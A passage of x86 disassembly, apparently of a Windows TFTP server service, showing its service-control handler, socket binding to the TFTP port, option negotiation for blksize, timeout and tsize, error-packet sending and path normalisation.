jmp loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C34: ; CODE XREF: sub_1001A91+129�j
; sub_1001A91+196�j
push 0
push dword_1005DDC
call dword_100103C ; WaitForSingleObject
test eax, eax
jz loc_1001D2F
cmp dword ptr [edi], 2
jl loc_1001CEA
xor edi, edi
cmp [esp+70h+arg_FFA8], edi
jz short loc_1001CDA
mov ax, [ebp+0]
push eax
call dword_1001104 ; ntohs
movzx ecx, ax
test ecx, ecx
jle short loc_1001CB8
cmp ecx, 2
jle short loc_1001C81
cmp ecx, 4
jz short loc_1001CB8
cmp ecx, 5
jnz short loc_1001CB8
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C81: ; CODE XREF: sub_1001A91+1E2�j
cmp ax, 1
jnz short loc_1001C94
inc dword_10060C4
mov edi, offset sub_1002F31
jmp short loc_1001CA5
; ---------------------------------------------------------------------------
loc_1001C94: ; CODE XREF: sub_1001A91+1F4�j
cmp ax, 2
jnz short loc_1001CA5
inc dword_10060C8
mov edi, offset sub_100333A
loc_1001CA5: ; CODE XREF: sub_1001A91+201�j
; sub_1001A91+207�j
mov eax, [esp+74h+arg_FFA0]
test edi, edi
mov [esi+8], eax
jz short loc_1001CEA
push esi
call edi ; sub_1002F31
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CB8: ; CODE XREF: sub_1001A91+1DD�j
; sub_1001A91+1E7�j ...
push 0
push 4
push [esp+7Ch+arg_FFA0]
inc dword_10060CC
lea eax, [esp+80h+var_20]
push eax
lea eax, [esp+84h+var_30]
push eax
call sub_100230A
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CDA: ; CODE XREF: sub_1001A91+1CB�j
mov eax, [esp+70h+arg_FFA4]
push esi
mov [esi+8], eax
call sub_1002EC8
loc_1001CEA: ; CODE XREF: sub_1001A91+19E�j
; sub_1001A91+1BC�j ...
push ebx
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call dword_100105C ; InterlockedIncrement
dec dword_1005DF4
push ebx
call dword_100104C ; RtlLeaveCriticalSection
xor ebp, ebp
jmp loc_1001AAA
; ---------------------------------------------------------------------------
loc_1001D27: ; CODE XREF: sub_1001A91+32�j
call dword_10010F8 ; WSAGetLastError
jmp short loc_1001D65
; ---------------------------------------------------------------------------
loc_1001D2F: ; CODE XREF: sub_1001A91+136�j
; sub_1001A91+161�j ...
push ebx
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call dword_100105C ; InterlockedIncrement
dec dword_1005DF4
loc_1001D5E: ; CODE XREF: sub_1001A91+9D�j
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1001D65: ; CODE XREF: sub_1001A91+3C�j
; sub_1001A91+29C�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 10004h
retn 8
sub_1001A91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_1001D74: ; DATA XREF: sub_100188E+2D�o
push ecx
push ebx
push ebp
push esi
mov esi, offset dword_1006020
push edi
mov edi, dword_1001070
push esi
xor ebp, ebp
xor ebx, ebx
call edi ; dword_1001070
loc_1001D8B: ; CODE XREF: seg000:01001DA1�j
test eax, eax
jnz short loc_1001DA7
push 0C8h
call dword_100106C ; Sleep
push esi
call edi ; dword_1001070
inc ebx
cmp ebx, 7Dh
jb short loc_1001D8B
test eax, eax
jz short loc_1001DD1
loc_1001DA7: ; CODE XREF: seg000:01001D8D�j
lea eax, [esp+10h]
push eax
push dword ptr [esp+1Ch]
call sub_10021E5
test eax, eax
jnz short loc_1001DC0
mov eax, [esp+10h]
mov ebp, [eax+0Ch]
loc_1001DC0: ; CODE XREF: seg000:01001DB7�j
push esi
call dword_100104C ; RtlLeaveCriticalSection
push ebp
push dword ptr [esp+1Ch]
call sub_1001A91
loc_1001DD1: ; CODE XREF: seg000:01001DA5�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1001DDB: ; DATA XREF: sub_100188E:loc_10018C2�o
push 0
push dword ptr [esp+8]
call sub_1001A91
xor eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001DEB proc near ; DATA XREF: sub_1001665+6�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
call dword_10010A4 ; time
inc dword_1006134
pop ecx
lea eax, [ebp+var_4]
push eax
call dword_10010B8 ; ctime
mov eax, [ebp+arg_0]
pop ecx
dec eax
jz short loc_1001E68
dec eax
jz short loc_1001E35
dec eax
jz short loc_1001E1D
dec eax
dec eax
jz short loc_1001E68
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E1D: ; CODE XREF: sub_1001DEB+2A�j
push dword_1006040
call dword_1001034 ; ResumeThread
mov dword_1006124, 4
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E35: ; CODE XREF: sub_1001DEB+27�j
push dword_1006040
call dword_1001074 ; SuspendThread
mov dword_1006124, 7
loc_1001E4B: ; CODE XREF: sub_1001DEB+30�j
; sub_1001DEB+48�j
push offset dword_1006120
push dword_1006044
call dword_1001014 ; SetServiceStatus
test eax, eax
jnz short locret_1001E6F
call dword_1001038 ; RtlGetLastWin32Error
jmp short locret_1001E6F
; ---------------------------------------------------------------------------
loc_1001E68: ; CODE XREF: sub_1001DEB+24�j
; sub_1001DEB+2E�j
push 0
call sub_1001E73
locret_1001E6F: ; CODE XREF: sub_1001DEB+73�j
; sub_1001DEB+7B�j
leave
retn 4
sub_1001DEB endp
; =============== S U B R O U T I N E =======================================
sub_1001E73 proc near ; CODE XREF: sub_1001665+B9�p
; sub_1001DEB+7F�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, dword_1001014
push edi
mov edi, offset dword_1006120
push edi
mov dword_1006124, 3
push dword_1006044
call esi ; dword_1001014
mov ebp, dword_1001038
xor ebx, ebx
cmp eax, ebx
jnz short loc_1001EA3
call ebp ; dword_1001038
loc_1001EA3: ; CODE XREF: sub_1001E73+2C�j
push dword_1005DDC
call dword_1001030 ; SetEvent
mov dword_1006124, 1
mov dword_1006134, ebx
mov eax, [esp+10h+arg_0]
mov dword_1006138, ebx
cmp eax, ebx
jnz short loc_1001EDB
mov dword_100612C, ebx
mov dword_1006130, ebx
jmp short loc_1001EFD
; ---------------------------------------------------------------------------
loc_1001EDB: ; CODE XREF: sub_1001E73+58�j
cmp eax, 834h
jb short loc_1001EF3
cmp eax, 16A7h
mov dword_100612C, 42Ah
jbe short loc_1001EF8
loc_1001EF3: ; CODE XREF: sub_1001E73+6D�j
mov dword_100612C, eax
loc_1001EF8: ; CODE XREF: sub_1001E73+7E�j
mov dword_1006130, eax
loc_1001EFD: ; CODE XREF: sub_1001E73+66�j
push edi
push dword_1006044
call esi ; dword_1001014
cmp eax, ebx
jnz short loc_1001F0C
call ebp ; dword_1001038
loc_1001F0C: ; CODE XREF: sub_1001E73+95�j
mov eax, dword_1005DE0
mov esi, dword_1001054
cmp eax, ebx
jz short loc_1001F24
push eax
call esi ; dword_1001054
mov dword_1005DE0, ebx
loc_1001F24: ; CODE XREF: sub_1001E73+A6�j
mov eax, dword_1005DDC
cmp eax, ebx
jz short loc_1001F36
push eax
call esi ; dword_1001054
mov dword_1005DDC, ebx
loc_1001F36: ; CODE XREF: sub_1001E73+B8�j
mov eax, dword_1005DD0
cmp eax, ebx
jz short loc_1001F4D
push eax
call dword_100109C ; fclose
pop ecx
mov dword_1005DD0, ebx
loc_1001F4D: ; CODE XREF: sub_1001E73+CA�j
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_1001E73 endp
; =============== S U B R O U T I N E =======================================
sub_1001F54 proc near ; CODE XREF: sub_1002182+1C�p
; sub_1002219+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0FFFFFFFFh
push dword ptr [esi+10h]
call dword_1001168 ; RtlDeregisterWaitEx
push dword ptr [esi+8]
call dword_100111C ; closesocket
push dword ptr [esi+14h]
call dword_1001118 ; WSACloseEvent
mov eax, [esi]
mov ecx, [esi+4]
cmp eax, ecx
jnz short loc_1001F90
mov eax, dword_1006038
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
jmp short loc_1001F9A
; ---------------------------------------------------------------------------
loc_1001F90: ; CODE XREF: sub_1001F54+29�j
mov [ecx], eax
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
loc_1001F9A: ; CODE XREF: sub_1001F54+3A�j
push esi
call dword_10010A0 ; free
pop ecx
pop esi
retn 4
sub_1001F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001FA6 proc near ; CODE XREF: sub_10018DB+3D�p
; sub_1002219+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_4]
push edi
push eax
push edi
mov [ebp+var_4], edi
mov [ebp+var_8], 0C0000017h
mov [ebx], edi
call sub_1003A4A ; GetIpAddrTable
cmp eax, edi
jz short loc_1001FD3
cmp eax, 7Ah
jnz short loc_100201A
loc_1001FD3: ; CODE XREF: sub_1001FA6+26�j
push [ebp+var_4]
call dword_1001094 ; malloc
mov esi, eax
pop ecx
cmp esi, edi
jz short loc_100201A
loc_1001FE3: ; CODE XREF: sub_1001FA6+63�j
lea eax, [ebp+var_4]
push edi
push eax
push esi
call sub_1003A4A ; GetIpAddrTable
cmp eax, edi
jz short loc_1002015
cmp eax, 7Ah
jnz short loc_100201A
push [ebp+var_4]
push esi
call dword_1001098 ; realloc
pop ecx
cmp eax, edi
pop ecx
jz short loc_100200B
mov esi, eax
jmp short loc_1001FE3
; ---------------------------------------------------------------------------
loc_100200B: ; CODE XREF: sub_1001FA6+5F�j
push esi
call dword_10010A0 ; free
pop ecx
jmp short loc_100201A
; ---------------------------------------------------------------------------
loc_1002015: ; CODE XREF: sub_1001FA6+4A�j
mov [ebp+var_8], edi
mov [ebx], esi
loc_100201A: ; CODE XREF: sub_1001FA6+2B�j
; sub_1001FA6+3B�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn 4
sub_1001FA6 endp
; =============== S U B R O U T I N E =======================================
sub_1002024 proc near ; CODE XREF: sub_100205A+B7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
call dword_1001120 ; inet_ntoa
test eax, eax
jz short locret_1002057
push edi
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push esi
mov eax, ecx
mov esi, edi
mov edi, [esp+8+arg_4]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
pop edi
locret_1002057: ; CODE XREF: sub_1002024+C�j
retn 8
sub_1002024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100205A proc near ; CODE XREF: sub_10018DB+64�p
; sub_1002219+65�p ...
var_28 = byte ptr -28h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_4], esi
loc_1002068: ; CODE XREF: sub_100205A+5D�j
push 1
push esi
push esi
push esi
push 2
push 2
call dword_10010F4 ; WSASocketA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_100209D
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push offset aUdp ; "udp"
push offset aTftp ; "tftp"
stosd
call dword_1001128 ; getservbyname
cmp eax, esi
jnz short loc_10020B9
jmp short loc_10020B1
; ---------------------------------------------------------------------------
loc_100209D: ; CODE XREF: sub_100205A+22�j
call dword_10010F8 ; WSAGetLastError
push 2EEh
call dword_100106C ; Sleep
inc [ebp+var_4]
loc_10020B1: ; CODE XREF: sub_100205A+41�j
cmp [ebp+var_4], 0Ah
jge short loc_10020E6
jmp short loc_1002068
; ---------------------------------------------------------------------------
loc_10020B9: ; CODE XREF: sub_100205A+3F�j
mov [ebp+var_14], 2
mov ax, [eax+8]
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call dword_1001124 ; bind
test eax, eax
jz short loc_10020E6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100215E
; ---------------------------------------------------------------------------
loc_10020E6: ; CODE XREF: sub_100205A+5B�j
; sub_100205A+82�j
cmp ebx, 0FFFFFFFFh
jz short loc_100215E
push 20h
call dword_1001094 ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_100213D
push 8
xor eax, eax
pop ecx
mov edi, esi
rep stosd
mov eax, [ebp+arg_0]
lea ecx, [ebp+var_28]
push ecx
push eax
mov [esi+8], ebx
mov [esi+0Ch], eax
call sub_1002024
xor eax, eax
push eax
push eax
push eax
push eax
call dword_1001040 ; CreateEventA
mov edi, eax
test edi, edi
jz short loc_1002140
push 1
push edi
push ebx
mov [esi+14h], edi
call sub_100188E
test eax, eax
mov [esi+10h], eax
jnz short loc_1002162
jmp short loc_1002140
; ---------------------------------------------------------------------------
loc_100213D: ; CODE XREF: sub_100205A+9E�j
mov edi, [ebp+arg_0]
loc_1002140: ; CODE XREF: sub_100205A+CC�j
; sub_100205A+E1�j
push ebx
call dword_100111C ; closesocket
test edi, edi
jz short loc_1002152
push edi
call dword_1001054 ; CloseHandle
loc_1002152: ; CODE XREF: sub_100205A+EF�j
test esi, esi
jz short loc_100215E
push esi
call dword_10010A0 ; free
pop ecx
loc_100215E: ; CODE XREF: sub_100205A+8A�j
; sub_100205A+8F�j ...
xor eax, eax
jmp short loc_100217B
; ---------------------------------------------------------------------------
loc_1002162: ; CODE XREF: sub_100205A+DF�j
mov eax, dword_1006038
mov dword ptr [esi+4], offset dword_1006038
mov [esi], eax
mov [eax+4], esi
mov dword_1006038, esi
mov eax, esi
loc_100217B: ; CODE XREF: sub_100205A+106�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100205A endp
; =============== S U B R O U T I N E =======================================
sub_1002182 proc near ; CODE XREF: sub_1002219:loc_1002298�p
mov ecx, dword_1006038
push esi
mov esi, offset dword_1006038
xor eax, eax
cmp ecx, esi
jz short loc_10021B3
push edi
loc_1002195: ; CODE XREF: sub_1002182+2E�j
cmp dword ptr [ecx+18h], 0
mov edi, [ecx]
jnz short loc_10021A8
push ecx
call sub_1001F54
push 1
pop eax
jmp short loc_10021AC
; ---------------------------------------------------------------------------
loc_10021A8: ; CODE XREF: sub_1002182+19�j
and dword ptr [ecx+18h], 0
loc_10021AC: ; CODE XREF: sub_1002182+24�j
cmp edi, esi
mov ecx, edi
jnz short loc_1002195
pop edi
loc_10021B3: ; CODE XREF: sub_1002182+10�j
pop esi
retn
sub_1002182 endp
; =============== S U B R O U T I N E =======================================
sub_10021B5 proc near ; CODE XREF: sub_1002219+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021C7: ; CODE XREF: sub_10021B5+21�j
cmp eax, ecx
jz short loc_10021DF
mov esi, [eax+0Ch]
cmp esi, [esp+4+arg_0]
jz short loc_10021D8
mov eax, [eax]
jmp short loc_10021C7
; ---------------------------------------------------------------------------
loc_10021D8: ; CODE XREF: sub_10021B5+1D�j
push 1
mov [edx], eax
pop eax
jmp short loc_10021E1
; ---------------------------------------------------------------------------
loc_10021DF: ; CODE XREF: sub_10021B5+14�j
xor eax, eax
loc_10021E1: ; CODE XREF: sub_10021B5+28�j
pop esi
retn 8
sub_10021B5 endp
; =============== S U B R O U T I N E =======================================
sub_10021E5 proc near ; CODE XREF: seg000:01001DB0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021F7: ; CODE XREF: sub_10021E5+21�j
cmp eax, ecx
jz short loc_100220A
mov esi, [eax+8]
cmp esi, [esp+4+arg_0]
jz short loc_1002208
mov eax, [eax]
jmp short loc_10021F7
; ---------------------------------------------------------------------------
loc_1002208: ; CODE XREF: sub_10021E5+1D�j
mov [edx], eax
loc_100220A: ; CODE XREF: sub_10021E5+14�j
mov eax, [edx]
pop esi
neg eax
sbb eax, eax
and al, 0A9h
add eax, 57h
retn 8
sub_10021E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002219 proc near ; DATA XREF: sub_10018DB+CB�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor esi, esi
push offset dword_1006020
mov [ebp+var_C], esi
call dword_1001058 ; RtlEnterCriticalSection
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
test eax, eax
jnz short loc_10022A9
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_1002298
loc_1002248: ; CODE XREF: sub_1002219+7D�j
mov eax, [eax+esi+4]
test eax, eax
jz short loc_100228D
cmp eax, 100007Fh
jz short loc_100228D
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_10021B5
test eax, eax
jz short loc_1002271
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
jmp short loc_100228D
; ---------------------------------------------------------------------------
loc_1002271: ; CODE XREF: sub_1002219+4A�j
mov eax, [ebp+var_4]
push 1
pop edi
push dword ptr [eax+esi+4]
mov [ebp+var_C], edi
call sub_100205A
test eax, eax
mov [ebp+var_8], eax
jz short loc_100228D
mov [eax+18h], edi
loc_100228D: ; CODE XREF: sub_1002219+35�j
; sub_1002219+3C�j ...
mov eax, [ebp+var_4]
inc ebx
add esi, 18h
cmp ebx, [eax]
jb short loc_1002248
loc_1002298: ; CODE XREF: sub_1002219+2D�j
call sub_1002182
push [ebp+var_4]
mov esi, eax
call dword_10010A0 ; free
pop ecx
loc_10022A9: ; CODE XREF: sub_1002219+24�j
cmp [ebp+var_C], 0
jnz short loc_10022E9
test esi, esi
jnz short loc_10022E9
mov eax, dword_1006038
mov edi, offset dword_1006038
cmp eax, edi
jz short loc_10022E9
loc_10022C1: ; CODE XREF: sub_1002219+CE�j
mov [ebp+var_8], eax
mov ebx, [eax]
test byte ptr [eax+1Ch], 1
jnz short loc_10022E3
mov esi, [eax+0Ch]
push eax
call sub_1001F54
push esi
call sub_100205A
test eax, eax
jz short loc_10022E3
or dword ptr [eax+1Ch], 1
loc_10022E3: ; CODE XREF: sub_1002219+B1�j
; sub_1002219+C4�j
cmp ebx, edi
mov eax, ebx
jnz short loc_10022C1
loc_10022E9: ; CODE XREF: sub_1002219+94�j
; sub_1002219+98�j ...
push offset dword_1006100
push offset dword_1005E00
call sub_1003A44 ; NotifyAddrChange
push offset dword_1006020
call dword_100104C ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100230A proc near ; CODE XREF: sub_1001A91+242�p
; sub_10023D8+23C�p ...
var_FFBC = word ptr -0FFBCh
var_FFBA = word ptr -0FFBAh
var_FFB8 = byte ptr -0FFB8h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 0FFBCh
call sub_1003A3E ; _chkstk
push ebx
push esi
mov esi, dword_1001104
push edi
push 5
call esi ; dword_1001104
mov edi, [ebp+arg_C]
mov [ebp+var_FFBC], ax
push edi
call esi ; dword_1001104
cmp [ebp+arg_10], 0
mov [ebp+var_FFBA], ax
jz short loc_1002369
mov edi, [ebp+arg_10]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [ebp+var_FFB8]
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+arg_10]
jmp short loc_10023A2
; ---------------------------------------------------------------------------
loc_1002369: ; CODE XREF: sub_100230A+32�j
cmp di, 9
jb short loc_1002371
xor edi, edi
loc_1002371: ; CODE XREF: sub_100230A+63�j
movzx eax, di
or ecx, 0FFFFFFFFh
lea ebx, [ebp+var_FFB8]
mov edx, off_1005CC0[eax*4]
xor eax, eax
mov edi, edx
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, edx
loc_10023A2: ; CODE XREF: sub_100230A+5D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
push 10h
push [ebp+arg_0]
not ecx
dec ecx
push eax
add ecx, 5
lea eax, [ebp+var_FFBC]
push ecx
push eax
push [ebp+arg_8]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_10023D1
call dword_10010F8 ; WSAGetLastError
loc_10023D1: ; CODE XREF: sub_100230A+BF�j
pop edi
pop esi
pop ebx
leave
retn 14h
sub_100230A endp
; =============== S U B R O U T I N E =======================================
sub_10023D8 proc near ; CODE XREF: sub_1002F31+302�p
; sub_100333A+26D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_0]
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_10]
mov dword ptr [eax+20h], 200h
mov dword ptr [eax+28h], 0Ah
mov eax, [esp+0Ch+arg_14]
push edi
mov ecx, 3FEFh
and dword ptr [eax], 0
xor eax, eax
mov edi, esi
push 6
rep stosd
call dword_1001104 ; ntohs
mov [esi], ax
lea ebx, [esi+2]
mov ebp, [esp+10h+arg_4]
cmp byte ptr [ebp+0], 0
jz loc_10025E4
loc_1002420: ; CODE XREF: sub_10023D8+202�j
mov esi, dword_100115C
push offset aBlksize ; "blksize"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_1002498
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
push 8
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
add ebp, esi
add ebx, esi
push ebp
call dword_1001160 ; atoi
pop ecx
cmp eax, esi
mov ecx, [esp+10h+arg_0]
mov [ecx+20h], eax
jb loc_10025FD
cmp eax, 0FFB8h
ja loc_10025FD
cmp eax, 5B0h
jnz short loc_100248F
mov dword ptr [ecx+20h], 200h
sub ebx, esi
jmp loc_10025C6
; ---------------------------------------------------------------------------
loc_100248F: ; CODE XREF: sub_10023D8+A7�j
push 0Ah
push ebx
push eax
jmp loc_1002597
; ---------------------------------------------------------------------------
loc_1002498: ; CODE XREF: sub_10023D8+5A�j
push offset aTimeout_0 ; "timeout"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_100251A
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
add ebp, 8
mov eax, ecx
mov esi, edi
mov edi, ebx
push ebp
shr ecx, 2
rep movsd
mov ecx, eax
add ebx, 8
and ecx, 3
rep movsb
call dword_1001160 ; atoi
pop ecx
mov ecx, [esp+10h+arg_0]
push 1
pop edx
cmp eax, edx
mov [ecx+28h], eax
jl loc_1002602
cmp eax, 0FFh
jg loc_1002602
mov eax, [esp+10h+arg_14]
mov edi, ebp
or ecx, 0FFFFFFFFh
mov [eax], edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebp
jmp loc_10025A2
; ---------------------------------------------------------------------------
loc_100251A: ; CODE XREF: sub_10023D8+CC�j
push offset aTsize ; "tsize"
push ebp
call esi ; dword_100115C
pop ecx
mov edi, ebp
test eax, eax
pop ecx
jnz loc_10025B2
or edx, 0FFFFFFFFh
xor eax, eax
mov ecx, edx
add ebp, 6
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
add ebx, 6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
cmp [esp+10h+arg_8], 2
rep movsb
jnz short loc_100258D
mov edi, ebp
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebp
mov ecx, edx
repne scasb
not ecx
dec ecx
mov edi, ebp
lea ebx, [ebx+ecx+1]
mov ecx, edx
jmp short loc_10025CB
; ---------------------------------------------------------------------------
loc_100258D: ; CODE XREF: sub_10023D8+180�j
mov eax, [esp+10h+arg_0]
push 0Ah
push ebx
push dword ptr [eax+24h]
loc_1002597: ; CODE XREF: sub_10023D8+BB�j
call dword_1001164 ; _itoa
add esp, 0Ch
mov edi, ebx
loc_10025A2: ; CODE XREF: sub_10023D8+13D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
lea ebx, [ebx+ecx+1]
jmp short loc_10025C6
; ---------------------------------------------------------------------------
loc_10025B2: ; CODE XREF: sub_10023D8+150�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jz short loc_10025E0
loc_10025C6: ; CODE XREF: sub_10023D8+B2�j
; sub_10023D8+1D8�j
mov edi, ebp
or ecx, 0FFFFFFFFh
loc_10025CB: ; CODE XREF: sub_10023D8+1B3�j
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jnz loc_1002420
loc_10025E0: ; CODE XREF: sub_10023D8+1EC�j
mov esi, [esp+10h+arg_10]
loc_10025E4: ; CODE XREF: sub_10023D8+42�j
mov eax, [esp+10h+arg_C]
sub ebx, esi
cmp ebx, 2
mov [eax], ebx
jnz short loc_10025F4
and dword ptr [eax], 0
loc_10025F4: ; CODE XREF: sub_10023D8+217�j
xor eax, eax
loc_10025F6: ; CODE XREF: sub_10023D8+244�j
pop edi
pop esi
pop ebp
pop ebx
retn 18h
; ---------------------------------------------------------------------------
loc_10025FD: ; CODE XREF: sub_10023D8+91�j
; sub_10023D8+9C�j
push 0
push esi
jmp short loc_1002606
; ---------------------------------------------------------------------------
loc_1002602: ; CODE XREF: sub_10023D8+105�j
; sub_10023D8+110�j
push 0
push 8
loc_1002606: ; CODE XREF: sub_10023D8+228�j
push dword ptr [ecx+8]
lea eax, [ecx+0FFF1h]
add ecx, 0Ch
push eax
push ecx
call sub_100230A
or eax, 0FFFFFFFFh
jmp short loc_10025F6
sub_10023D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100261E proc near ; CODE XREF: sub_1002F31+130�p
; sub_100333A+150�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov al, [ebx]
mov ecx, ebx
mov esi, ebx
mov [ebp+arg_0], ebx
loc_1002630: ; CODE XREF: sub_100261E+22�j
test al, al
jz short loc_1002642
cmp al, 5Ch
jz short loc_100263C
cmp al, 2Fh
jnz short loc_1002642
loc_100263C: ; CODE XREF: sub_100261E+18�j
mov al, [ecx+1]
inc ecx
jmp short loc_1002630
; ---------------------------------------------------------------------------
loc_1002642: ; CODE XREF: sub_100261E+14�j
; sub_100261E+1C�j ...
mov al, [ecx]
test al, al
jz loc_10026E4
cmp al, 2Eh
jnz loc_100271C
mov dl, [ecx+1]
lea edi, [ecx+1]
cmp dl, 5Ch
jz loc_1002718
cmp dl, 2Fh
jz loc_1002718
cmp dl, al
jnz loc_1002703
mov dl, [ecx+2]
lea edi, [ecx+2]
cmp dl, 5Ch
jz short loc_1002684
cmp dl, 2Fh
jnz short loc_1002703
loc_1002684: ; CODE XREF: sub_100261E+5F�j
dec esi
mov ecx, edi
dec esi
cmp esi, ebx
jbe short loc_10026E0
loc_100268C: ; CODE XREF: sub_100261E+7B�j
mov al, [esi]
cmp al, 5Ch
jz short loc_100269B
cmp al, 2Fh
jz short loc_100269B
dec esi
cmp esi, ebx
jnb short loc_100268C
loc_100269B: ; CODE XREF: sub_100261E+72�j
; sub_100261E+76�j
inc esi
loc_100269C: ; CODE XREF: sub_100261E+8E�j
; sub_100261E+EE�j ...
cmp esi, [ebp+arg_0]
jbe short loc_10026AE
cmp byte ptr [esi-1], 20h
lea eax, [esi-1]
jnz short loc_10026AE
mov esi, eax
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_10026AE: ; CODE XREF: sub_100261E+81�j
; sub_100261E+8A�j
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026B8
cmp al, 2Fh
jnz short loc_1002642
loc_10026B8: ; CODE XREF: sub_100261E+94�j
cmp esi, ebx
jz short loc_10026CB
mov al, [esi-1]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
